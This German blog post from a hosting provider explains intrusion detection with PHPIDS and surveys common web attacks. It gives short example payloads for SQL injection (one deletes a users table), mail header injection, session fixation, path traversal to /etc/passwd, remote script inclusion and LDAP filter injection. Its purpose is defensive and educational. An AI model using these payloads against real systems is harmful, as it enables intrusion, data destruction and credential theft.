Adacor - Cloud, Hosting, IT Security

Intrusion Detection System – System und Netzwerke richtig absichern

28. April 2014 von Nastia Jagupov

Bei der Entwicklung von Webseiten ist die Absicherung des Systems vor Hacking-Attacken wichtig. So unterstützt ein Intrusion Detection System die frühzeitige Erkennung von Angriffen auf internetbasierte Systeme.

Sicherheit vor HackerangriffenWas hinter dem Begriff steckt und wie das Alarmsystem funktioniert, beschreibe ich in meinem Beitrag.
Ein Intrusion Detection System (IDS) ist in der Lage, Zugriffe auf ein System zu analysieren, die ein auffälliges Verhalten aufweisen. Es erkennt zeitnah heimtückische und potenziell gefährliche Angriffe und Sicherheitsverletzungen auf Computersysteme oder Netzwerke und schlägt augenblicklich Alarm.

Bevor ich häufige Hacking-Attacken beschreibe, werfen wir einen Blick darauf, wie IDS funktioniert.

Wie funktioniert ein Intrusion Detection System?

Ein Intrusion Detection System bietet zahlreiche Funktionalitäten zur Unterstützung der Datensicherheit im Internet. Bei der Webentwicklung kommt häufig das PHPIDS zum Einsatz. Die PHP-basierende, quelloffene Software erkennt mithilfe einer Liste mit definierten, regulären Ausdrücken die gängigsten Angriffsmuster, die über die Methoden „POST“ und „GET“ ausgeführt werden. Das IDS analysiert dabei alle empfangenen Request-Variablen mithilfe der Filterregel auf mögliche Angriffe. Je mehr Regeln anschlagen, desto höher ist die Angriffswahrscheinlichkeit. Nachdem der Wahrscheinlichkeitswert eines Angriffs berechnet wurde, können Administrator oder Programmierer entscheiden, wie die Software reagieren soll: Entweder wird eine Warn-E-Mail verschickt oder das Programm wird abgebrochen.

Cloud Journey für den Mittelstand

Die Grundlagen einer erfolgreichen Cloud Journey

  • - Antworten auf Ihre wichtigsten Fragen der Cloud Migration.
  • - Handfeste Beispiele für unterschiedliche Szenarien
  • - In drei Stufen ein digital erfolgreiches Unternehmen werden


Jetzt mehr wissen

Wie integriert man ein Intrusion Detection System mit PHPIDS?

Einbinden und Starten von PHPIDS

Zum Vergrößern bitte klicken

Die Integration von PHPIDS ist einfach und erfordert keine großen Vorkenntnisse. Im ersten Schritt werden die PHPIDS-Dateien in das Verzeichnis „lib/IDS“ geladen. Dabei sollte man beachten, dass das Verzeichnis „IDS/tmp“ die notwendige Schreibberechtigung besitzt. In diesem Ordner werden nämlich Log- und Cache-Dateien abgelegt.

Welche Hacking-Attacken treten am häufigsten auf?

Es gibt unzählige Angriffsformen, welche die Sicherheit von vertraulichen Daten, die im Internet erhoben, verarbeitet und gespeichert werden, gefährden. Zu den häufigsten Offensiven zählen:

1. SQL-Injection

Unter Zuhilfenahme dieser Technik kann ein Angreifer SQL-Kommandos erstellen oder existierende Befehle verändern. Die Ziele hinter einer SQL-Einschleusung sind vielseitig und reichen von der Sichtbarmachung versteckter Daten über das Überschreiben von Daten bis hin zur Ausführung gefährlicher Befehle. Die entsprechende Sicherheitslücke entsteht entweder durch fehlerhafte Maskierung oder mangelhafte Überprüfung der Benutzereingaben.

Beispiel für SQL-Injection:

$_POST[‘username‘] = “ ‘ OR 1 ‘“; oder
$_POST[‘username‘] = “ ’ ; DELETE FROM `users` WHERE 1 OR `username` = ‘”; $query = „SELECT * FROM `users` WHERE `username` = ‘”.$_POST[‘username‘].”’;
Ausgabe mit Wert1: SELECT * FROM `users` WHERE `username` = ‘’ OR 1 ‘’
Ausgabe mit Wert2: SELECT * FROM `users` WHERE `username` = ‘’; DELETE FROM `users` WHERE 1 OR `username` = ‘’

2. Header-Injection

Header-Manipulationen sind möglich, wenn die Header eines Protokolls durch unzureichend geprüfte Benutzereingaben generiert werden.

Beispiel Mail-Header-Funktion:

mail(“empfaenger@example.com“, $betreff, $nachricht, $_GET[‘ from‘]);
Die Variable $_GET[‘ from‘] ist ungeprüft und kann zusätzliche Parameter für den Kopfbereich einer E-Mail enthalten.

3. Session Hijacking

Bei dieser Angriffsart stiehlt der Angreifer eine fremde Session und übernimmt anschließend die komplette Sitzung mit allen ihren Zugangsmöglichkeiten. Die gestohlenen Daten setzt er anschließend in seinen Cookies als eigene Session-ID ein. Damit ist der Hacker in der Lage, eine Website mit der Identität seines Opfers, statt mit seiner eigenen, zu besuchen.

4. Session Fixation

Bei der Session-Manipulation jubelt der Angreifer seinem Opfer beispielsweise eine URL mit einer aktiven Session-ID unter (z. B. http://www.example.de?PHPSESSIONID= [angreifer-session-id]). Meldet sich das Opfer mit dieser Session an, hat der Betrüger Vollzugriff auf das System.

5. Cookie Poisoning

Diese Hacking-Form ermöglicht dem Angreifer die Modifikation der im Cookie (Textdatei mit persönlichen Informationen des Anwenders) gespeicherten Werte, zum Beispiel zum Zweck des Identitätsdiebstahls.

6. Cross-Site-Scripting (XSS)

Das websiteübergreifende Scripting bezeichnet das Ausnutzen von Sicherheitslücken auf Webseiten, indem Informationen aus einem nicht vertrauenswürdigen Kontext, in einen als zuverlässig scheinenden Kontext eingefügt werden. Der Einbruch erfolgt mittels JavaScript-Code über eine manipulierte URL und dient dem Identitätsdiebstahl. Zusätzlich können getarnte Angriffe durch Zeichensätze wie UTF-7, Shell-Code und Kommentarverschleierung erfolgen: z. B. https://www.deinebank.de/search=

7.Directory Traversal

Diese Sicherheitslücke ermöglicht den Zugriff auf unberechtigte Dateien und Verzeichnisse durch die Manipulation der Pfadangabe. Alternativ kann der Hacker anhand einer Webadresse externe Scripts einbinden.
Beispiel 1: http://www.example.com/get-files?file=/etc/passwd
Beispiel 2: http://www.example.com/page=http://other-site-with-script.com/other_script.php

8. Denial of Service Attacks

Der Angreifer überflutet den Webserver so lange mit Datenanfragen, bis dieser die Aufgaben nicht mehr bewältigen kann und wegen Überlastung den Dienst verweigert. In der Folge ist der Server eine Zeit lang nicht mehr erreichbar.

9. LDAP-Attacken

Mithilfe dieser speziellen Angriffsform lassen sich auf LDAP (Leightweight Directory Access Protocoll) basierende Applikationen kompromittieren. Beispielsweise kann ein Angreifer die Verzeichnisse so verändern, dass er die Berechtigung für einen Zugang erhält, über den er Inhalte verändern, hinzufügen oder löschen kann.

Beispiel für eine LDAP-Attacke:

Bei einem Login werden die Parameter wie folgt aufgebaut: (&(USER=username)(PASSWORD=pwd)).
Gibt man für den USER folgendes ein:“ testnutzer)(&))“,
wird der Parameter wie folgt aufgebaut: (&(USER=testuser)(&))(PASSWORD=pdw).
Es wird eine Anfrage mit dem Parameter (&(USER=testuser)(&)) an den Server geschickt, die immer TRUE zurückliefert.

Fazit: Einsatz eines Intrusion Detection System erfordert Fachwissen

Sicher ist, dass die Angriffe auf Computersysteme und Netzwerke auch in Zukunft Hochkonjunktur haben werden. Deshalb sollte jedes Unternehmen das Thema „Intrusion Detection System“ in sein IT-Sicherheitskonzept mitaufnehmen. Allerdings gibt es beim Einsatz eines IDS-Systems einiges zu beachten. Fehler in der Planungsphase machen sich spätestens im Betrieb bemerkbar und sorgen im schlechtesten Fall dafür, dass ein System nicht alle Angriffe erkennt. Daher sollte man bereits frühzeitig einen Experten einbinden, der sich mit möglichen Fehlerquellen und Sicherheitslücken auskennt und der Erfahrung mit der Implementierung von IDS-Systemen hat. Nur dann ist gewährleistet, dass der Einsatz dieser „Alarmanlage“ ein voller Erfolg wird.

Verwandte Artikel